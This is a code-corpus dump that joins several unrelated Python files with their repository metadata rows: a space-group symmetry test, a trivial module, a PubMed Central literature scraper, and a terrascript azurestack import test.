'x+1/2,z,y', '-x+3/4,z+1/2,-y+3/4', '-z+1/4,-y+1/4,x+1/2', '-z+3/4,y+1/2,-x+3/4', 'z,-y+3/4,-x+1/4',
'z+1/2,y,x', 'x+1/2,y,z+1/2', '-x+3/4,-y+3/4,z', '-x+1/4,y+1/2,-z+3/4', 'x,-y+1/4,-z+1/4',
'z+1/2,x,y+1/2', 'z,-x+1/4,-y+1/4', '-z+3/4,-x+3/4,y', '-z+1/4,x+1/2,-y+3/4', 'y+1/2,z,x+1/2',
'-y+1/4,z+1/2,-x+3/4', 'y,-z+1/4,-x+1/4', '-y+3/4,-z+3/4,x', 'y+1/4,x+1/4,-z+1/2', '-y,-x+1/2,-z',
'y+3/4,-x,z+1/4', '-y+1/2,x+3/4,z+3/4', 'x+1/4,z+1/4,-y+1/2', '-x+1/2,z+3/4,y+3/4', '-x,-z+1/2,-y',
'x+3/4,-z,y+1/4', 'z+1/4,y+1/4,-x+1/2', 'z+3/4,-y,x+1/4', '-z+1/2,y+3/4,x+3/4', '-z,-y+1/2,-x',
'-x+1/2,-y,-z+1/2', 'x+1/4,y+1/4,-z', 'x+3/4,-y+1/2,z+1/4', '-x,y+3/4,z+3/4', '-z+1/2,-x,-y+1/2',
'-z,x+3/4,y+3/4', 'z+1/4,x+1/4,-y', 'z+3/4,-x+1/2,y+1/4', '-y+1/2,-z,-x+1/2', 'y+3/4,-z+1/2,x+1/4',
'-y,z+3/4,x+3/4', 'y+1/4,z+1/4,-x', '-y+3/4,-x+3/4,z+1/2', 'y,x+1/2,z', '-y+1/4,x,-z+3/4',
'y+1/2,-x+1/4,-z+1/4', '-x+3/4,-z+3/4,y+1/2', 'x+1/2,-z+1/4,-y+1/4', 'x,z+1/2,y', '-x+1/4,z,-y+3/4',
'-z+3/4,-y+3/4,x+1/2', '-z+1/4,y,-x+3/4', 'z+1/2,-y+1/4,-x+1/4', 'z,y+1/2,x', 'x+1/2,y+1/2,z',
'-x+3/4,-y+1/4,z+1/2', '-x+1/4,y,-z+1/4', 'x,-y+3/4,-z+3/4', 'z+1/2,x+1/2,y', 'z,-x+3/4,-y+3/4',
'-z+3/4,-x+1/4,y+1/2', '-z+1/4,x,-y+1/4', 'y+1/2,z+1/2,x', '-y+1/4,z,-x+1/4', 'y,-z+3/4,-x+3/4',
'-y+3/4,-z+1/4,x+1/2', 'y+1/4,x+3/4,-z', '-y,-x,-z+1/2', 'y+3/4,-x+1/2,z+3/4', '-y+1/2,x+1/4,z+1/4',
'x+1/4,z+3/4,-y', '-x+1/2,z+1/4,y+1/4', '-x,-z,-y+1/2', 'x+3/4,-z+1/2,y+3/4', 'z+1/4,y+3/4,-x',
'z+3/4,-y+1/2,x+3/4', '-z+1/2,y+1/4,x+1/4', '-z,-y,-x+1/2', '-x+1/2,-y+1/2,-z', 'x+1/4,y+3/4,-z+1/2',
'x+3/4,-y,z+3/4', '-x,y+1/4,z+1/4', '-z+1/2,-x+1/2,-y', '-z,x+1/4,y+1/4', 'z+1/4,x+3/4,-y+1/2',
'z+3/4,-x,y+3/4', '-y+1/2,-z+1/2,-x', 'y+3/4,-z,x+3/4', '-y,z+1/4,x+1/4', 'y+1/4,z+3/4,-x+1/2',
'-y+3/4,-x+1/4,z', 'y,x,z+1/2', '-y+1/4,x+1/2,-z+1/4', 'y+1/2,-x+3/4,-z+3/4', '-x+3/4,-z+1/4,y',
'x+1/2,-z+3/4,-y+3/4', 'x,z,y+1/2', '-x+1/4,z+1/2,-y+1/4', '-z+3/4,-y+1/4,x', '-z+1/4,y+1/2,-x+1/4',
'z+1/2,-y+3/4,-x+3/4', 'z,y,x+1/2'],
229: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y',
'z,x,-y', 'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y,-x,z', 'y,x,z', '-y,x,-z', 'y,-x,-z',
'-x,-z,y', 'x,-z,-y', 'x,z,y', '-x,z,-y', '-z,-y,x', '-z,y,-x', 'z,-y,-x', 'z,y,x', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2',
'z+1/2,-x+1/2,-y+1/2', '-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2',
'-y+1/2,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', 'y+1/2,x+1/2,-z+1/2',
'-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2', '-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2',
'-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2', 'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2',
'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2', '-z+1/2,-y+1/2,-x+1/2', '-x+1/2,-y+1/2,-z+1/2',
'x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,z+1/2', '-z+1/2,-x+1/2,-y+1/2',
'-z+1/2,x+1/2,y+1/2', 'z+1/2,x+1/2,-y+1/2', 'z+1/2,-x+1/2,y+1/2', '-y+1/2,-z+1/2,-x+1/2',
'y+1/2,-z+1/2,x+1/2', '-y+1/2,z+1/2,x+1/2', 'y+1/2,z+1/2,-x+1/2', '-y+1/2,-x+1/2,z+1/2',
'y+1/2,x+1/2,z+1/2', '-y+1/2,x+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y+1/2',
'x+1/2,-z+1/2,-y+1/2', 'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-z+1/2,-y+1/2,x+1/2',
'-z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,-x+1/2', 'z+1/2,y+1/2,x+1/2'],
230: ['x,y,z', '-x+1/2,-y,z+1/2', '-x,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z', 'z,x,y', 'z+1/2,-x+1/2,-y',
'-z+1/2,-x,y+1/2', '-z,x+1/2,-y+1/2', 'y,z,x', '-y,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x', '-y+1/2,-z,x+1/2',
'y+3/4,x+1/4,-z+1/4', '-y+3/4,-x+3/4,-z+3/4', 'y+1/4,-x+1/4,z+3/4', '-y+1/4,x+3/4,z+1/4',
'x+3/4,z+1/4,-y+1/4', '-x+1/4,z+3/4,y+1/4', '-x+3/4,-z+3/4,-y+3/4', 'x+1/4,-z+1/4,y+3/4',
'z+3/4,y+1/4,-x+1/4', 'z+1/4,-y+1/4,x+3/4', '-z+1/4,y+3/4,x+1/4', '-z+3/4,-y+3/4,-x+3/4', '-x,-y,-z',
'x+1/2,y,-z+1/2', 'x,-y+1/2,z+1/2', '-x+1/2,y+1/2,z', '-z,-x,-y', '-z+1/2,x+1/2,y', 'z+1/2,x,-y+1/2',
'z,-x+1/2,y+1/2', '-y,-z,-x', 'y,-z+1/2,x+1/2', '-y+1/2,z+1/2,x', 'y+1/2,z,-x+1/2',
'-y+1/4,-x+3/4,z+3/4', 'y+1/4,x+1/4,z+1/4', '-y+3/4,x+3/4,-z+1/4', 'y+3/4,-x+1/4,-z+3/4',
'-x+1/4,-z+3/4,y+3/4', 'x+3/4,-z+1/4,-y+3/4', 'x+1/4,z+1/4,y+1/4', '-x+3/4,z+3/4,-y+1/4',
'-z+1/4,-y+3/4,x+3/4', '-z+3/4,y+3/4,-x+1/4', 'z+3/4,-y+1/4,-x+3/4', 'z+1/4,y+1/4,x+1/4',
'x+1/2,y+1/2,z+1/2', '-x,-y+1/2,z', '-x+1/2,y,-z', 'x,-y,-z+1/2', 'z+1/2,x+1/2,y+1/2', 'z,-x,-y+1/2',
'-z,-x+1/2,y', '-z+1/2,x,-y', 'y+1/2,z+1/2,x+1/2', '-y+1/2,z,-x', 'y,-z,-x+1/2', '-y,-z+1/2,x',
'y+1/4,x+3/4,-z+3/4', '-y+1/4,-x+1/4,-z+1/4', 'y+3/4,-x+3/4,z+1/4', '-y+3/4,x+1/4,z+3/4',
'x+1/4,z+3/4,-y+3/4', '-x+3/4,z+1/4,y+3/4', '-x+1/4,-z+1/4,-y+1/4', 'x+3/4,-z+3/4,y+1/4',
'z+1/4,y+3/4,-x+3/4', 'z+3/4,-y+3/4,x+1/4', '-z+3/4,y+1/4,x+3/4', '-z+1/4,-y+1/4,-x+1/4',
'-x+1/2,-y+1/2,-z+1/2', 'x,y+1/2,-z', 'x+1/2,-y,z', '-x,y,z+1/2', '-z+1/2,-x+1/2,-y+1/2', '-z,x,y+1/2',
'z,x+1/2,-y', 'z+1/2,-x,y', '-y+1/2,-z+1/2,-x+1/2', 'y+1/2,-z,x', '-y,z,x+1/2', 'y,z+1/2,-x',
'-y+3/4,-x+1/4,z+1/4', 'y+3/4,x+3/4,z+3/4', '-y+1/4,x+1/4,-z+3/4', 'y+1/4,-x+3/4,-z+1/4',
'-x+3/4,-z+1/4,y+1/4', 'x+1/4,-z+3/4,-y+1/4', 'x+3/4,z+3/4,y+3/4', '-x+1/4,z+1/4,-y+3/4',
'-z+3/4,-y+1/4,x+1/4', '-z+1/4,y+1/4,-x+3/4', 'z+1/4,-y+3/4,-x+1/4', 'z+3/4,y+3/4,x+3/4']}
def test_generators():
    for i in range(1, 231):
        sg = symmetry.SpaceGroup(i)
        string_generators = sg.string_generators
        gens_str = symmetry.get_str_from_generator(sg.generators)
        for op in gens_str:
            assert (op in string_generators)


def test_operators():
    for i in range(1, 231):
        sg = symmetry.SpaceGroup(i)
        symops = sg.symmetry_operations
        symops_str = symmetry.get_str_from_generator(symops)
        assert (len(symops_str) == len(poses[i]))
        for op in poses[i]:
            assert (op in symops_str)


if __name__ == "__main__":
    pytest.main()
| 98 | 120 | 0.31944 | 26,654 | 85,750 | 1.02675 | 0.01013 | 0.327109 | 0.169584 | 0.141338 | 0.966639 | 0.966492 | 0.963679 | 0.963313 | 0.962583 | 0.96134 | 0 | 0.189842 | 0.186985 | 85,750 | 874 | 121 | 98.112128 | 0.202708 | 0.000735 | 0 | 0.165509 | 0 | 0 | 0.637402 | 0.007913 | 0 | 0 | 0 | 0 | 0.003472 | 1 | 0.002315 | false | 0 | 0.002315 | 0 | 0.00463 | 0 | 0 | 0 | 1 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
9e973901bc2c7503d62d3b183d01693c93100c31 | 27 | py | Python | project3_absolute/package3/module3.py | munich-ml/Python-imports | da41467507a7edf1d12c1a78d9aff812a6b553ed | [
"MIT"
] | null | null | null | project3_absolute/package3/module3.py | munich-ml/Python-imports | da41467507a7edf1d12c1a78d9aff812a6b553ed | [
"MIT"
] | null | null | null | project3_absolute/package3/module3.py | munich-ml/Python-imports | da41467507a7edf1d12c1a78d9aff812a6b553ed | [
"MIT"
] | null | null | null | def func3():
    return 42 | 13.5 | 13 | 0.592593 | 4 | 27 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 0.296296 | 27 | 2 | 14 | 13.5 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7
9eaf68c1a15945ec2e29748770691f2ea107d806 | 13,431 | py | Python | PubMedScraperFunctions.py | alexcwsmith/scNLP | 1691316f1dc13774fa05b0e6ea075941667fa6b0 | [
"MIT"
] | 1 | 2021-06-23T13:07:29.000Z | 2021-06-23T13:07:29.000Z | PubMedScraperFunctions.py | alexcwsmith/scNLP | 1691316f1dc13774fa05b0e6ea075941667fa6b0 | [
"MIT"
] | null | null | null | PubMedScraperFunctions.py | alexcwsmith/scNLP | 1691316f1dc13774fa05b0e6ea075941667fa6b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 26 03:06:01 2020
@author: smith
"""
from Bio import Entrez
import pandas as pd
from bs4 import BeautifulSoup
from multiprocessing import Pool
import os
import glob
import nltk
import requests
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.tokenize import sent_tokenize
import matplotlib.pyplot as plt
from config.PubMedScraperSettings import *
def info(title):
    print(title, 'processID:', os.getpid())
def countPMCResults(term1):
    page = requests.get('https://www.ncbi.nlm.nih.gov/pmc/?term=' + term1)
    soup = BeautifulSoup(page.content, 'html.parser')
    res = soup.find(id='maincontent')
    res = soup.find(class_='result_count left').get_text()
    numRes = int(res.rsplit()[-1])
    return(numRes)
def findPMCIDs(searchTerm, term2=None, results=20, start=0, sort='relevance'):
    search = Entrez.esearch(db='pmc', retmax=results, term=searchTerm, retstart=start, sort=sort)
    record = Entrez.read(search)
    recDf = pd.DataFrame.from_dict(record, orient='index').T
    IDs = recDf.IdList.apply(pd.Series).T
    IDs.columns = ['PMCID']
    # IDs.to_excel(os.path.join(paperDirectory, searchTerm + '_PMCIDS.xlsx'))
    IDlist = IDs['PMCID'].tolist()
    if len(IDlist) < 5:
        print("WARNING: Low number of results detected for " + str(searchTerm.split(' ')[0]))
    if term2 is not None:
        search = Entrez.esearch(db='pmc', retmax=results, term=term2, retstart=start, sort=sort)
        record = Entrez.read(search)
        recDf = pd.DataFrame.from_dict(record, orient='index').T
        IDs_term2 = recDf.IdList.apply(pd.Series).T
        IDs_term2.columns = ['PMCID']
        IDlist2 = IDs_term2['PMCID'].tolist()
        IDlist.extend(IDlist2)
    return(IDlist)
def getFullText(PMCID):
    if not os.path.exists(paperDirectory):
        os.mkdir(paperDirectory)
        os.mkdir(os.path.join(paperDirectory, 'null/'))
    if not os.path.exists(abstractDirectory):
        os.mkdir(abstractDirectory)
    if not os.path.exists(titleDirectory):
        os.mkdir(titleDirectory)
    article = Entrez.efetch(db='pmc', id=PMCID, rettype='full', retmode='xml')
    art = article.read()
    soup = BeautifulSoup(art, 'html.parser')
    title = soup.find('article-title').get_text()
    journal = soup.find('journal-title')
    if hasattr(journal, 'get_text'):
        journal = soup.find('journal-title').get_text()
    else:
        journal = None
    tables = soup.find_all('tr')
    tab = list(tables)
    for t in tab:
        try:
            t.decompose()
        except AttributeError:
            pass
    try:
        doi = soup.find_all('article-id')[2].get_text()
    except IndexError:
        doi = 'No DOI available'
    info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
    with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
        f.write(info)
        f.close()
    abstract = soup.find('abstract')
    if hasattr(abstract, 'get_text') == True:
        abstract_text = abstract.get_text()
        with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract.txt'), 'w+') as fa:
            fa.write(abstract_text)
            fa.close()
    elif hasattr(abstract, 'get_text') == False:
        with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
            fa.write('No abstract available')
            fa.close()
    body = soup.find('body')
    if hasattr(body, 'get_text') == True:
        body_text = body.get_text()
        body_text = re.sub(r'[\ \n]{2,}', '', body_text)
        with open(os.path.join(paperDirectory, str(PMCID) + '_fulltext.txt'), 'w') as fb:
            fb.write(body_text)
            fb.close()
    elif hasattr(body, 'get_text') == False:
        with open(os.path.join(paperDirectory, 'null/' + str(PMCID) + '_fulltext_null.txt'), 'w+') as fb:
            fb.write('No full text available')
            fb.close()
def getFullTexts(IDs, results=50, start=0, end=None, sort='relevance'):
    if not os.path.exists(paperDirectory):
        os.mkdir(paperDirectory)
        os.mkdir(os.path.join(paperDirectory, 'null/'))
    if not os.path.exists(abstractDirectory):
        os.mkdir(abstractDirectory)
    if not os.path.exists(titleDirectory):
        os.mkdir(titleDirectory)
    for ID in IDs[start:end]:
        dirs = os.listdir(paperDirectory)
        if len(dirs)-2 < results:
            getFullText(ID)
        else:
            pass
def getFullTextGene(PMCID, directory, gene=None):
    paperDirectory = os.path.join(directory, 'papers/' + str(gene) + '/')
    if not os.path.exists(paperDirectory):
        os.mkdir(paperDirectory)
        os.mkdir(os.path.join(paperDirectory, 'null/'))
    if not os.path.exists(abstractDirectory):
        os.mkdir(abstractDirectory)
        os.mkdir(os.path.join(abstractDirectory, 'null/'))
    if not os.path.exists(titleDirectory):
        os.mkdir(titleDirectory)
    article = Entrez.efetch(db='pmc', id=PMCID, rettype='full', retmode='xml')
    art = article.read()
    soup = BeautifulSoup(art, 'html.parser')
    if hasattr(soup.find('article-title'), 'get_text') == True:
        title = soup.find('article-title').get_text()
    elif hasattr(soup.find('article-title'), 'get_text') == False:
        title = 'No title available'
    journal = soup.find('journal-title').get_text()
    tables = soup.find_all('tr')
    tab = list(tables)
    for t in tab:
        try:
            t.decompose()
        except AttributeError:
            pass
    try:
        doi = soup.find_all('article-id')[2].get_text()
    except IndexError:
        doi = 'No DOI available'
    info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
    with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
        f.write(info)
        f.close()
    abstract = soup.find('abstract')
    if hasattr(abstract, 'get_text') == True:
        abstract_text = abstract.get_text()
        with open(os.path.join(abstractDirectory, gene + '/' + str(PMCID) + '_abstract.txt'), 'w+') as fa:
            fa.write(abstract_text)
            fa.close()
    elif hasattr(abstract, 'get_text') == False:
        with open(os.path.join(abstractDirectory, gene + '/null/' + str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
            fa.write('No abstract available')
            fa.close()
    body = soup.find('body')
    if hasattr(body, 'get_text') == True:
        body_text = body.get_text()
        body_text = re.sub(r'[\ \n]{2,}', '', body_text)
        with open(os.path.join(paperDirectory, str(PMCID) + '_fulltext.txt'), 'w') as fb:
            fb.write(body_text)
            fb.close()
    elif hasattr(body, 'get_text') == False:
        with open(os.path.join(paperDirectory, 'null/' + str(PMCID) + '_fulltext_null.txt'), 'w+') as fb:
            fb.write('No full text available')
            fb.close()
def getFullTextsGene(IDs, directory, gene=None, results=50, start=0, end=None, sort='relevance'):
    complete = False
    paperDirectory = os.path.join(directory, 'papers/', str(gene) + '/')
    if not os.path.exists(paperDirectory):
        os.mkdir(paperDirectory)
        os.mkdir(os.path.join(paperDirectory, 'null/'))
    if not os.path.exists(abstractDirectory):
        os.mkdir(abstractDirectory)
    if not os.path.exists(titleDirectory):
        os.mkdir(titleDirectory)
    for ID in IDs[start:end]:
        dirs = os.listdir(paperDirectory)
        if len(dirs)-2 < results:
            getFullTextGene(ID, directory=directory, gene=gene)
        elif len(dirs)-2 == results:
            pass
    dirs = os.listdir(paperDirectory)
    print("Retrieved " + str(len(dirs)-1) + " literature results for " + gene)
    if len(dirs)-1 == 0:
        print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
        print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
def getAbstracts(PMCID):
    if not os.path.exists(paperDirectory):
        os.mkdir(paperDirectory)
        os.mkdir(os.path.join(paperDirectory, 'null/'))
    if not os.path.exists(abstractDirectory):
        os.mkdir(abstractDirectory)
    if not os.path.exists(titleDirectory):
        os.mkdir(titleDirectory)
    article = Entrez.efetch(db='pmc', id=PMCID, rettype='abstract', retmode='xml')
    art = article.read()
    soup = BeautifulSoup(art, 'html.parser')
    title = soup.find('article-title').get_text()
    journal = soup.find('journal-title')
    if hasattr(journal, 'get_text'):
        journal = soup.find('journal-title').get_text()
    else:
        journal = None
    tables = soup.find_all('tr')
    tab = list(tables)
    for t in tab:
        try:
            t.decompose()
        except AttributeError:
            pass
    try:
        doi = soup.find_all('article-id')[2].get_text()
    except IndexError:
        doi = 'No DOI available'
    info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
    with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
        f.write(info)
        f.close()
    abstract = soup.find('abstract')
    if hasattr(abstract, 'get_text') == True:
        abstract_text = abstract.get_text()
        with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract.txt'), 'w+') as fa:
            fa.write(abstract_text)
            fa.close()
    elif hasattr(abstract, 'get_text') == False:
        with open(os.path.join(abstractDirectory, str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
            fa.write('No abstract available')
            fa.close()
def getAbstractGene(PMCID, directory, gene=None):
    paperDirectory = os.path.join(directory, 'papers/' + str(gene) + '/')
    if not os.path.exists(paperDirectory):
        os.mkdir(paperDirectory)
        os.mkdir(os.path.join(paperDirectory, 'null/'))
    if not os.path.exists(abstractDirectory):
        os.mkdir(abstractDirectory)
    if not os.path.exists(titleDirectory):
        os.mkdir(titleDirectory)
    article = Entrez.efetch(db='pmc', id=PMCID, rettype='abstract', retmode='xml')
    art = article.read()
    soup = BeautifulSoup(art, 'html.parser')
    if hasattr(soup.find('article-title'), 'get_text') == True:
        title = soup.find('article-title').get_text()
    elif hasattr(soup.find('article-title'), 'get_text') == False:
        title = 'No title available'
    journal = soup.find('journal-title').get_text()
    tables = soup.find_all('tr')
    tab = list(tables)
    for t in tab:
        try:
            t.decompose()
        except AttributeError:
            pass
    try:
        doi = soup.find_all('article-id')[2].get_text()
    except IndexError:
        doi = 'No DOI available'
    info = 'TITLE: ' + str(title) + '\n' + 'JOURNAL: ' + str(journal) + '\n' + 'DOI: ' + str(doi)
    with open(os.path.join(titleDirectory, str(PMCID) + '_info.txt'), 'w+') as f:
        f.write(info)
        f.close()
    abstract = soup.find('abstract')
    if hasattr(abstract, 'get_text') == True:
        abstract_text = abstract.get_text()
        with open(os.path.join(abstractDirectory, str(gene) + '/' + str(PMCID) + '_abstract.txt'), 'w+') as fa:
            fa.write(abstract_text)
            fa.close()
    elif hasattr(abstract, 'get_text') == False:
        with open(os.path.join(abstractDirectory, str(gene) + '/' + str(PMCID) + '_abstract_null.txt'), 'w+') as fa:
            fa.write('No abstract available')
            fa.close()
def getAbstractsGene(IDs, directory, gene=None, results=500, start=0, end=None, sort='relevance'):
    complete = False
    abstractDirectory = os.path.join(directory, 'abstracts/', str(gene) + '/')
    if not os.path.exists(paperDirectory):
        os.mkdir(paperDirectory)
        os.mkdir(os.path.join(paperDirectory, 'null/'))
    if not os.path.exists(abstractDirectory):
        os.mkdir(abstractDirectory)
    if not os.path.exists(titleDirectory):
        os.mkdir(titleDirectory)
    for ID in IDs[start:end]:
        dirs = os.listdir(abstractDirectory)
        if len(dirs) < results:
            getAbstractGene(ID, directory=directory, gene=gene)
        elif len(dirs) == results:
            pass
    dirs = os.listdir(abstractDirectory)
    print("Retrieved " + str(len(dirs)-1) + " literature results for " + gene)
    if len(dirs)-1 == 0:
        print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
        print("WARNING: NO RESULTS RETRIEVED FOR " + gene)
def combineTextFiles(directory, rettype='full', sizeLimit=1e6):
    if rettype == 'full':
        read_files = glob.glob(os.path.join(directory, '*fulltext.txt'))
    elif rettype == 'abstract':
        read_files = glob.glob(os.path.join(directory, '*abstract.txt'))
    skipList = []
    with open(os.path.join(directory, 'CombinedFullTexts.txt'), 'w+') as outfile:
        for file in read_files:
            if os.stat(file).st_size < sizeLimit:
                with open(file, 'r+') as infile:
                    outfile.write(infile.read())
            else:
                skipList.append(file)
    with open(os.path.join(directory, 'skippedFullTexts.txt'), 'w+') as f:
        f.write('\n'.join(skipList))
        f.close()
    with open(os.path.join(directory, 'CombinedFullTexts.txt'), 'r+') as r:
        text = r.read()
        r.close()
    # return(text)
| 38.930435 | 116 | 0.613506 | 1,682 | 13,431 | 4.840666 | 0.127229 | 0.039794 | 0.040531 | 0.028371 | 0.812577 | 0.800909 | 0.795505 | 0.788136 | 0.733112 | 0.733112 | 0 | 0.005635 | 0.233713 | 13,431 | 344 | 117 | 39.043605 | 0.785464 | 0.013774 | 0 | 0.757377 | 0 | 0 | 0.130274 | 0.003176 | 0.013115 | 0 | 0 | 0 | 0 | 1 | 0.036066 | false | 0.022951 | 0.045902 | 0 | 0.081967 | 0.02623 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7b77bdadff5b3e43456a956fcb7c22043ca7548e | 4,219 | py | Python | tests/test_provider_hashicorp_azurestack.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_hashicorp_azurestack.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_hashicorp_azurestack.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_hashicorp_azurestack.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:13:15 UTC)
def test_provider_import():
    import terrascript.provider.hashicorp.azurestack
def test_resource_import():
    from terrascript.resource.hashicorp.azurestack import azurestack_availability_set
    from terrascript.resource.hashicorp.azurestack import azurestack_dns_a_record
    from terrascript.resource.hashicorp.azurestack import azurestack_dns_zone
    from terrascript.resource.hashicorp.azurestack import azurestack_lb
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_lb_backend_address_pool,
    )
    from terrascript.resource.hashicorp.azurestack import azurestack_lb_nat_pool
    from terrascript.resource.hashicorp.azurestack import azurestack_lb_nat_rule
    from terrascript.resource.hashicorp.azurestack import azurestack_lb_probe
    from terrascript.resource.hashicorp.azurestack import azurestack_lb_rule
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_local_network_gateway,
    )
    from terrascript.resource.hashicorp.azurestack import azurestack_managed_disk
    from terrascript.resource.hashicorp.azurestack import azurestack_network_interface
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_network_security_group,
    )
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_network_security_rule,
    )
    from terrascript.resource.hashicorp.azurestack import azurestack_public_ip
    from terrascript.resource.hashicorp.azurestack import azurestack_resource_group
    from terrascript.resource.hashicorp.azurestack import azurestack_route
    from terrascript.resource.hashicorp.azurestack import azurestack_route_table
    from terrascript.resource.hashicorp.azurestack import azurestack_storage_account
    from terrascript.resource.hashicorp.azurestack import azurestack_storage_blob
    from terrascript.resource.hashicorp.azurestack import azurestack_storage_container
    from terrascript.resource.hashicorp.azurestack import azurestack_subnet
    from terrascript.resource.hashicorp.azurestack import azurestack_template_deployment
    from terrascript.resource.hashicorp.azurestack import azurestack_virtual_machine
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_virtual_machine_extension,
    )
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_virtual_machine_scale_set,
    )
    from terrascript.resource.hashicorp.azurestack import azurestack_virtual_network
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_virtual_network_gateway,
    )
    from terrascript.resource.hashicorp.azurestack import (
        azurestack_virtual_network_gateway_connection,
    )
def test_datasource_import():
    from terrascript.data.hashicorp.azurestack import azurestack_client_config
    from terrascript.data.hashicorp.azurestack import azurestack_network_interface
    from terrascript.data.hashicorp.azurestack import azurestack_network_security_group
    from terrascript.data.hashicorp.azurestack import azurestack_platform_image
    from terrascript.data.hashicorp.azurestack import azurestack_public_ip
    from terrascript.data.hashicorp.azurestack import azurestack_resource_group
    from terrascript.data.hashicorp.azurestack import azurestack_route_table
    from terrascript.data.hashicorp.azurestack import azurestack_storage_account
    from terrascript.data.hashicorp.azurestack import azurestack_subnet
    from terrascript.data.hashicorp.azurestack import azurestack_virtual_network
    from terrascript.data.hashicorp.azurestack import azurestack_virtual_network_gateway
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.azurestack
#
# t = terrascript.provider.hashicorp.azurestack.azurestack()
# s = str(t)
#
# assert 'https://github.com/hashicorp/terraform-provider-azurestack' in s
# assert '0.10.0' in s
